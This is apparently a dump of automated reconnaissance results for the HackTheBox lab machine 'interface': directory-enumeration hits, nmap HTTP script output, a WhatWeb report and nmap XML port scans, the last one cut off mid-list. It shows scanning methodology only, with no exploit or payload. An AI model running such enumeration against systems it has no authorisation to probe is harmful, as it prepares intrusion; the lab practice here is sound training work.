+308      GET        1l        1w        0c http://interface.htb/v1/_next/static/chunks/pages/ => http://interface.htb/v1/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/v1/_next/static/ => http://interface.htb/v1/_next/static
+308      GET        1l        1w        0c http://interface.htb/v2/_next/static/chunks/ => http://interface.htb/v2/_next/static/chunks
+308      GET        1l        1w        0c http://interface.htb/v1/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/v1/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/v2/application/ => http://interface.htb/v2/application
+308      GET        1l        1w        0c http://interface.htb/v2/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/v2/_next/static/Z79wh4kSTt439cxBUytQN
+308      GET        1l        1w        0c http://interface.htb/v2/_next/static/chunks/pages/ => http://interface.htb/v2/_next/static/chunks/pages
+308      GET        1l        1w        0c http://interface.htb/v2/_next/static/ => http://interface.htb/v2/_next/static
+308      GET        1l        1w        0c http://interface.htb/v2/_next/ => http://interface.htb/v2/_next
+200      GET        1l        2w       77c http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN/_ssgManifest.js
+308      GET        1l        1w        0c http://interface.htb/_next/static/chunks/pages/ => http://interface.htb/_next/static/chunks/pages
+200      GET        5l       46w    15086c http://interface.htb/favicon.ico
+308      GET        1l        1w        0c http://interface.htb/application/ => http://interface.htb/application
+200      GET        1l      316w    15444c http://interface.htb/_next/static/chunks/pages/index-c95e13dd48858e5b.js
+200      GET        1l      111w     6359c http://interface.htb/
+308      GET        1l        1w        0c http://interface.htb/_next/static/chunks/ => http://interface.htb/_next/static/chunks
+200      GET        1l       39w     1591c http://interface.htb/_next/static/chunks/webpack-ee7e63bc15b31913.js
+200      GET        1l        1w      282c http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN/_buildManifest.js
+308      GET        1l        1w        0c http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN/ => http://interface.htb/_next/static/Z79wh4kSTt439cxBUytQN
+200      GET        1l        5w      279c http://interface.htb/_next/static/chunks/pages/_app-df511a3677d160f6.js
+200      GET        1l     1559w    86841c http://interface.htb/_next/static/chunks/main-50de763069eba4b2.js
+200      GET        1l        3w      245c http://interface.htb/_next/static/chunks/pages/_error-dfcfa5bb62767c20.js
+308      GET        1l        1w        0c http://interface.htb/_next/static/ => http://interface.htb/_next/static
+308      GET        1l        1w        0c http://interface.htb/_next/ => http://interface.htb/_next
+200      GET       33l     2908w   141045c http://interface.htb/_next/static/chunks/framework-8c5acb0054140387.js
+200      GET        1l     1821w    91460c http://interface.htb/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js

HTB/interface/results/scans/tcp80/tcp_80_http_nmap.txt

@@ -0,0 +1,296 @@
+# Nmap 7.93 scan initiated Sat Feb 11 20:04:30 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/simon/htb/interface/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/simon/htb/interface/results/scans/tcp80/xml/tcp_80_http_nmap.xml interface.htb
+Nmap scan report for interface.htb (10.129.146.193)
+Host is up, received user-set (0.019s latency).
+Scanned at 2023-02-11 20:04:33 CET for 110s
+
+PORT   STATE SERVICE REASON         VERSION
+80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
+|_http-malware-host: Host appears to be clean
+|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-date: Sat, 11 Feb 2023 19:04:43 GMT; +1s from local time.
+|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
+|_http-mobileversion-checker: No mobile version detected.
+| http-sitemap-generator: 
+|   Directory structure:
+|     /
+|       Other: 1
+|   Longest directory structure:
+|     Depth: 0
+|     Dir: /
+|   Total files found (by extension):
+|_    Other: 1
+| http-grep: 
+|   (1) http://interface.htb:80/: 
+|     (1) email: 
+|_      + contact@interface.htb
+| http-php-version: Logo query returned unknown hash 40fb3eaf773f86d5719fcbfb2dd978df
+|_Credits query returned unknown hash 40fb3eaf773f86d5719fcbfb2dd978df
+|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
+|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
+|_http-jsonp-detection: Couldn't find any JSONP endpoints.
+|_http-errors: Couldn't find any error pages.
+| http-vhosts: 
+|_128 names had status 200
+|_http-favicon: Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA
+| http-useragent-tester: 
+|   Status for browser useragent: 200
+|   Allowed User Agents: 
+|     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
+|     libwww
+|     lwp-trivial
+|     libcurl-agent/1.0
+|     PHP/
+|     Python-urllib/2.5
+|     GT::WWW
+|     Snoopy
+|     MFC_Tear_Sample
+|     HTTP::Lite
+|     PHPCrawl
+|     URI::Fetch
+|     Zend_Http_Client
+|     http client
+|     PECL::HTTP
+|     Wget/1.13.4 (linux-gnu)
+|_    WWW-Mechanize/1.34
+|_http-fetch: Please enter the complete path of the directory to save data in.
+|_http-config-backup: ERROR: Script execution failed (use -d to debug)
+|_http-server-header: nginx/1.14.0 (Ubuntu)
+|_http-chrono: Request times for /; avg: 270.73ms; min: 153.90ms; max: 523.51ms
+| http-wordpress-enum: 
+| Search limited to top 100 themes/plugins
+|   plugins
+|     akismet
+|     contact-form-7
+|     wordpress-seo
+|     jetpack
+|     all-in-one-seo-pack
+|     wordfence
+|     woocommerce
+|     google-sitemap-generator
+|     wordpress-importer
+|     nextgen-gallery
+|     google-analytics-for-wordpress
+|     wp-super-cache
+|     tinymce-advanced
+|     wptouch
+|     better-wp-security
+|     siteorigin-panels
+|     updraftplus
+|     w3-total-cache
+|     google-analytics-dashboard-for-wp
+|     wp-pagenavi
+|     si-contact-form
+|     advanced-custom-fields
+|     mailchimp-for-wp
+|     the-events-calendar
+|     add-to-any
+|     duplicator
+|     wysija-newsletters
+|     ninja-forms
+|     wp-smushit
+|     buddypress
+|     ewww-image-optimizer
+|     so-widgets-bundle
+|     really-simple-captcha
+|     ml-slider
+|     black-studio-tinymce-widget
+|     photo-gallery
+|     broken-link-checker
+|     regenerate-thumbnails
+|     google-analyticator
+|     redirection
+|     captcha
+|     duplicate-post
+|     breadcrumb-navxt
+|     backwpup
+|     user-role-editor
+|     yet-another-related-posts-plugin
+|     contact-form-plugin
+|     newsletter
+|     bbpress
+|     all-in-one-wp-security-and-firewall
+|     disable-comments
+|     social-networks-auto-poster-facebook-twitter-g
+|     wp-optimize
+|     addthis
+|     wp-statistics
+|     wp-e-commerce
+|     all-in-one-wp-migration
+|     backupwordpress
+|     si-captcha-for-wordpress
+|     wp-slimstat
+|     wp-google-maps
+|     wp-spamshield
+|     wp-maintenance-mode
+|     googleanalytics
+|     worker
+|     yith-woocommerce-wishlist
+|     wp-multibyte-patch
+|     wp-to-twitter
+|     image-widget
+|     wp-db-backup
+|     shortcodes-ultimate
+|     ultimate-tinymce
+|     share-this
+|     disqus-comment-system
+|     gallery-bank
+|     types
+|     wp-polls
+|     custom-post-type-ui
+|     shareaholic
+|     polylang
+|     post-types-order
+|     gtranslate
+|     bulletproof-security
+|     wp-fastest-cache
+|     facebook
+|     sociable
+|     iwp-client
+|     nextgen-facebook
+|     seo-ultimate
+|     wp-postviews
+|     formidable
+|     squirrly-seo
+|     wp-mail-smtp
+|     tablepress
+|     redux-framework
+|     page-links-to
+|     youtube-embed-plus
+|     contact-bank
+|     maintenance
+|     wp-retina-2x
+|   themes
+|     twentyeleven
+|     twentytwelve
+|     twentyten
+|     twentythirteen
+|     twentyfourteen
+|     twentyfifteen
+|     responsive
+|     customizr
+|     zerif-lite
+|     virtue
+|     storefront
+|     atahualpa
+|     twentysixteen
+|     vantage
+|     hueman
+|     spacious
+|     evolve
+|     colorway
+|     graphene
+|     sydney
+|     ifeature
+|     mh-magazine-lite
+|     generatepress
+|     mantra
+|     omega
+|     onetone
+|     coraline
+|     pinboard
+|     thematic
+|     sparkling
+|     catch-box
+|     make
+|     colormag
+|     enigma
+|     custom-community
+|     mystique
+|     alexandria
+|     delicate
+|     lightword
+|     attitude
+|     inove
+|     magazine-basic
+|     raindrops
+|     minamaze
+|     zbench
+|     point
+|     eclipse
+|     portfolio-press
+|     twentyseventeen
+|     travelify
+|     swift-basic
+|     iconic-one
+|     arcade-basic
+|     bouquet
+|     pixel
+|     sliding-door
+|     pilcrow
+|     simple-catch
+|     tempera
+|     destro
+|     p2
+|     sunspot
+|     sundance
+|     dusk-to-dawn
+|     onepress
+|     moesia
+|     dynamic-news-lite
+|     parabola
+|     parament
+|     dazzling
+|     accesspress-lite
+|     optimizer
+|     one-page
+|     chaostheory
+|     business-lite
+|     duster
+|     constructor
+|     nirvana
+|     sixteen
+|     esquire
+|     beach
+|     next-saturday
+|     flat
+|     hatch
+|     minimatica
+|     radiate
+|     accelerate
+|     oxygen
+|     accesspress-parallax
+|     swift
+|     spun
+|     wp-creativix
+|     suevafree
+|     hemingway
+|     pink-touch-2
+|     motion
+|     fruitful
+|     steira
+|     news
+|_    llorix-one-lite
+|_http-dombased-xss: Couldn't find any DOM based XSS.
+| http-security-headers: 
+|   Content_Security_Policy: 
+|     Header: Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;
+|     Description: Define which scripts the protected resource can execute.
+|     Description: Define which styles (CSS) the user applies to the protected resource.
+|     Description: Define from where the protected resource can load images.
+|     Description: Define from where the protected resource can embed frames.
+|_    Description: Define which URIs the protected resource can load using script interfaces.
+| http-headers: 
+|   Server: nginx/1.14.0 (Ubuntu)
+|   Date: Sat, 11 Feb 2023 19:04:44 GMT
+|   Content-Type: text/html; charset=utf-8
+|   Content-Length: 6359
+|   Connection: close
+|   Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;
+|   X-Powered-By: Next.js
+|   ETag: "i8ubiadkff4wf"
+|   Vary: Accept-Encoding
+|   
+|_  (Request type: HEAD)
+|_http-referer-checker: Couldn't find any cross-domain scripts.
+|_http-feed: Couldn't find any feeds.
+|_http-comments-displayer: Couldn't find any comments.
+|_http-csrf: Couldn't find any CSRF vulnerabilities.
+|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
+|_http-title: Site Maintenance
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Feb 11 20:06:23 2023 -- 1 IP address (1 host up) scanned in 113.44 seconds

HTB/interface/results/scans/tcp80/tcp_80_http_whatweb.txt

@@ -0,0 +1,75 @@
+WhatWeb report for http://interface.htb:80
+Status    : 200 OK
+Title     : <None>
+IP        : 10.129.146.193
+Country   : RESERVED, ZZ
+
+Summary   : Email[contact@interface.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.14.0 (Ubuntu)], nginx[1.14.0], Script[application/json], UncommonHeaders[content-security-policy], X-Powered-By[Next.js]
+
+Detected Plugins:
+[ Email ]
+	Extract email addresses. Find valid email address and
+	syntactically invalid email addresses from mailto: link
+	tags. We match syntactically invalid links containing
+	mailto: to catch anti-spam email addresses, eg. bob at
+	gmail.com. This uses the simplified email regular
+	expression from
+	http://www.regular-expressions.info/email.html for valid
+	email address matching.
+
+	String       : contact@interface.htb
+	String       : contact@interface.htb
+
+[ HTML5 ]
+	HTML version 5, detected by the doctype declaration
+
+
+[ HTTPServer ]
+	HTTP server header string. This plugin also attempts to
+	identify the operating system from the server header.
+
+	OS           : Ubuntu Linux
+	String       : nginx/1.14.0 (Ubuntu) (from server string)
+
+[ Script ]
+	This plugin detects instances of script HTML elements and
+	returns the script language/type.
+
+	String       : application/json
+
+[ UncommonHeaders ]
+	Uncommon HTTP server headers. The blacklist includes all
+	the standard headers and many non standard but common ones.
+	Interesting but fairly common headers should have their own
+	plugins, eg. x-powered-by, server and x-aspnet-version.
+	Info about headers can be found at www.http-stats.com
+
+	String       : content-security-policy (from headers)
+
+[ X-Powered-By ]
+	X-Powered-By HTTP header
+
+	String       : Next.js (from x-powered-by string)
+
+[ nginx ]
+	Nginx (Engine-X) is a free, open-source, high-performance
+	HTTP server and reverse proxy, as well as an IMAP/POP3
+	proxy server.
+
+	Version      : 1.14.0
+	Website     : http://nginx.net/
+
+HTTP Headers:
+	HTTP/1.1 200 OK
+	Server: nginx/1.14.0 (Ubuntu)
+	Date: Sat, 11 Feb 2023 19:04:51 GMT
+	Content-Type: text/html; charset=utf-8
+	Transfer-Encoding: chunked
+	Connection: close
+	Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' data: https://www.google.com http://www.google-analytics.com/gtm/js https://*.gstatic.com/feedback/ https://ajax.googleapis.com; connect-src 'self' http://prd.m.rendering-api.interface.htb; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://www.google.com; img-src https: data:; child-src data:;
+	X-Powered-By: Next.js
+	ETag: "i8ubiadkff4wf"
+	Vary: Accept-Encoding
+	Content-Encoding: gzip
+
+

HTB/interface/results/scans/xml/_full_tcp_nmap.xml

@@ -0,0 +1,121 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Sat Feb 11 20:03:59 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/simon/htb/interface/results/scans/_full_tcp_nmap.txt -oX /home/simon/htb/interface/results/scans/xml/_full_tcp_nmap.xml interface.htb -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/simon/htb/interface/results/scans/_full_tcp_nmap.txt -oX /home/simon/htb/interface/results/scans/xml/_full_tcp_nmap.xml interface.htb" start="1676142239" startstr="Sat Feb 11 20:03:59 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="syn" protocol="tcp" numservices="65535" services="1-65535"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1676142240"/>
+<taskend task="NSE" time="1676142240"/>
+<taskbegin task="NSE" time="1676142240"/>
+<taskend task="NSE" time="1676142240"/>
+<taskbegin task="NSE" time="1676142240"/>
+<taskend task="NSE" time="1676142240"/>
+<taskbegin task="SYN Stealth Scan" time="1676142240"/>
+<taskend task="SYN Stealth Scan" time="1676142261" extrainfo="65535 total ports"/>
+<taskbegin task="Service scan" time="1676142261"/>
+<taskend task="Service scan" time="1676142267" extrainfo="2 services on 1 host"/>
+<taskbegin task="Traceroute" time="1676142271"/>
+<taskend task="Traceroute" time="1676142271"/>
+<taskbegin task="Parallel DNS resolution of 1 host." time="1676142271"/>
+<taskend task="Parallel DNS resolution of 1 host." time="1676142282"/>
+<taskbegin task="NSE" time="1676142282"/>
+<taskend task="NSE" time="1676142287"/>
+<taskbegin task="NSE" time="1676142287"/>
+<taskend task="NSE" time="1676142288"/>
+<taskbegin task="NSE" time="1676142288"/>
+<taskend task="NSE" time="1676142288"/>
+<host starttime="1676142240" endtime="1676142288"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.129.146.193" addrtype="ipv4"/>
+<hostnames>
+<hostname name="interface.htb" type="user"/>
+<hostname name="interface.htb" type="PTR"/>
+</hostnames>
+<ports><extraports state="closed" count="65533">
+<extrareasons reason="reset" count="65533" proto="tcp" ports="1-21,23-79,81-65535"/>
+</extraports>
+<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="7.6p1 Ubuntu 4ubuntu0.7" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:7.6p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa;  2048 7289a0957eceaea8596b2d2dbc90b55a (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDsUhYQQaT6D7Isd510Mjs3HcpUf64NWRgfkCDtCcPC3KjgNKdOByzhdgpqKftmogBoGPHDlfDboK5hTEm/6mqhbNQDhOiX1Y++AXwcgLAOpjfSExhKQSyKZVveZCl/JjB/th0YA12XJXECXl5GbNFtxDW6DnueLP5l0gWzFxJdtj7C57yai6MpHieKm564NOhsAqYqcxX8O54E9xUBW4u9n2vSM6ZnMutQiNSkfanyV0Pdo+yRWBY9TpfYHvt5A3qfcNbF3tMdQ6wddCPi98g+mEBdIbn1wQOvL0POpZ4DVg0asibwRAGo1NiUX3+dJDJbThkO7TeLyROvX/kostPH&#xa;  256 01848c66d34ec4b1611f2d4d389c42c3 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=&#xa;  256 cc62905560a658629e6b80105c799b55 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy"><table>
+<elem key="fingerprint">7289a0957eceaea8596b2d2dbc90b55a</elem>
+<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABAQDsUhYQQaT6D7Isd510Mjs3HcpUf64NWRgfkCDtCcPC3KjgNKdOByzhdgpqKftmogBoGPHDlfDboK5hTEm/6mqhbNQDhOiX1Y++AXwcgLAOpjfSExhKQSyKZVveZCl/JjB/th0YA12XJXECXl5GbNFtxDW6DnueLP5l0gWzFxJdtj7C57yai6MpHieKm564NOhsAqYqcxX8O54E9xUBW4u9n2vSM6ZnMutQiNSkfanyV0Pdo+yRWBY9TpfYHvt5A3qfcNbF3tMdQ6wddCPi98g+mEBdIbn1wQOvL0POpZ4DVg0asibwRAGo1NiUX3+dJDJbThkO7TeLyROvX/kostPH</elem>
+<elem key="bits">2048</elem>
+<elem key="type">ssh-rsa</elem>
+</table>
+<table>
+<elem key="fingerprint">01848c66d34ec4b1611f2d4d389c42c3</elem>
+<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGrQxMOFdtvAa9AGgwirSYniXm7NpzZbgIKhzgCOM1qwqK8QFkN6tZuQsCsRSzZ59+3l+Ycx5lTn11fbqLFqoqM=</elem>
+<elem key="bits">256</elem>
+<elem key="type">ecdsa-sha2-nistp256</elem>
+</table>
+<table>
+<elem key="fingerprint">cc62905560a658629e6b80105c799b55</elem>
+<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIPtZ4bP4/4TJNGMNMmXWqt2dLijhttMoaeiJYJRJ4Kqy</elem>
+<elem key="bits">256</elem>
+<elem key="type">ssh-ed25519</elem>
+</table>
+</script></port>
+<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="nginx" version="1.14.0" extrainfo="Ubuntu" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:igor_sysoev:nginx:1.14.0</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="http-title" output="Site Maintenance"><elem key="title">Site Maintenance</elem>
+</script><script id="http-favicon" output="Unknown favicon MD5: 21B739D43FCB9BBB83D8541FE4FE88FA"/><script id="http-methods" output="&#xa;  Supported Methods: GET HEAD"><table key="Supported Methods">
+<elem>GET</elem>
+<elem>HEAD</elem>
+</table>
+</script><script id="http-server-header" output="nginx/1.14.0 (Ubuntu)"><elem>nginx/1.14.0 (Ubuntu)</elem>
+</script></port>
+</ports>
+<os><portused state="open" proto="tcp" portid="22"/>
+<portused state="closed" proto="tcp" portid="1"/>
+<osmatch name="Linux 5.0" accuracy="93" line="68042">
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:5.0</cpe></osclass>
+</osmatch>
+<osmatch name="Linux 5.4" accuracy="93" line="68176">
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:5.4</cpe></osclass>
+</osmatch>
+<osmatch name="Linux 5.0 - 5.4" accuracy="93" line="68103">
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="93"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
+</osmatch>
+<osmatch name="HP P2000 G3 NAS device" accuracy="91" line="35037">
+<osclass type="storage-misc" vendor="HP" osfamily="embedded" accuracy="91"><cpe>cpe:/h:hp:p2000_g3</cpe></osclass>
+</osmatch>
+<osmatch name="Linux 4.15 - 5.6" accuracy="91" line="67238">
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="4.X" accuracy="91"><cpe>cpe:/o:linux:linux_kernel:4</cpe></osclass>
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="91"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
+</osmatch>
+<osmatch name="Linux 5.3 - 5.4" accuracy="90" line="68140">
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="90"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
+</osmatch>
+<osmatch name="Linux 2.6.32" accuracy="90" line="55653">
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="90"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
+</osmatch>
+<osmatch name="Infomir MAG-250 set-top box" accuracy="90" line="59627">
+<osclass type="media device" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="90"><cpe>cpe:/o:linux:linux_kernel:2.6</cpe></osclass>
+<osclass type="media device" vendor="Infomir" osfamily="embedded" accuracy="90"><cpe>cpe:/h:infomir:mag-250</cpe></osclass>
+</osmatch>
+<osmatch name="Ubiquiti AirMax NanoStation WAP (Linux 2.6.32)" accuracy="90" line="61697">
+<osclass type="WAP" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="90"><cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe></osclass>
+<osclass type="WAP" vendor="Ubiquiti" osfamily="embedded" accuracy="90"><cpe>cpe:/h:ubnt:airmax_nanostation</cpe></osclass>
+</osmatch>
+<osmatch name="Linux 5.0 - 5.3" accuracy="90" line="68082">
+<osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="5.X" accuracy="90"><cpe>cpe:/o:linux:linux_kernel:5</cpe></osclass>
+</osmatch>
+<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=2/11%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63E7E6D0%P=x86_64-pc-linux-gnu)&#xa;SEQ(SP=FE%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)&#xa;OPS(O1=M569ST11NW7%O2=M569ST11NW7%O3=M569NNT11NW7%O4=M569ST11NW7%O5=M569ST11NW7%O6=M569ST11)&#xa;WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)&#xa;ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M569NNSNW7%CC=Y%Q=)&#xa;T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)&#xa;T2(R=N)&#xa;T3(R=N)&#xa;T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T7(R=N)&#xa;U1(R=N)&#xa;IE(R=Y%DFI=N%TG=40%CD=S)&#xa;"/>
+</os>
+<uptime seconds="1617114" lastboot="Tue Jan 24 02:52:54 2023"/>
+<distance value="2"/>
+<tcpsequence index="254" difficulty="Good luck!" values="6E7799C5,D88F519E,92669C94,DBEE6FCD,30589D86,5EBE6547"/>
+<ipidsequence class="All zeros" values="0,0,0,0,0,0"/>
+<tcptssequence class="1000HZ" values="6062EB9F,6062EC04,6062EC7E,6062ECCC,6062ED30,6062ED93"/>
+<trace port="53" proto="tcp">
+<hop ttl="1" ipaddr="10.10.16.1" rtt="77.01"/>
+<hop ttl="2" ipaddr="10.129.146.193" rtt="77.09" host="interface.htb"/>
+</trace>
+<times srtt="59511" rttvar="30912" to="183159"/>
+</host>
+<taskbegin task="NSE" time="1676142288"/>
+<taskend task="NSE" time="1676142288"/>
+<taskbegin task="NSE" time="1676142288"/>
+<taskend task="NSE" time="1676142288"/>
+<taskbegin task="NSE" time="1676142288"/>
+<taskend task="NSE" time="1676142288"/>
+<runstats><finished time="1676142288" timestr="Sat Feb 11 20:04:48 2023" summary="Nmap done at Sat Feb 11 20:04:48 2023; 1 IP address (1 host up) scanned in 49.84 seconds" elapsed="49.84" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>

HTB/interface/results/scans/xml/_quick_tcp_nmap.xml

@@ -0,0 +1,98 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Sat Feb 11 20:03:59 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/simon/htb/interface/results/scans/_quick_tcp_nmap.txt -oX /home/simon/htb/interface/results/scans/xml/_quick_tcp_nmap.xml interface.htb -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/simon/htb/interface/results/scans/_quick_tcp_nmap.txt -oX /home/simon/htb/interface/results/scans/xml/_quick_tcp_nmap.xml interface.htb" start="1676142239" startstr="Sat Feb 11 20:03:59 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="syn" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-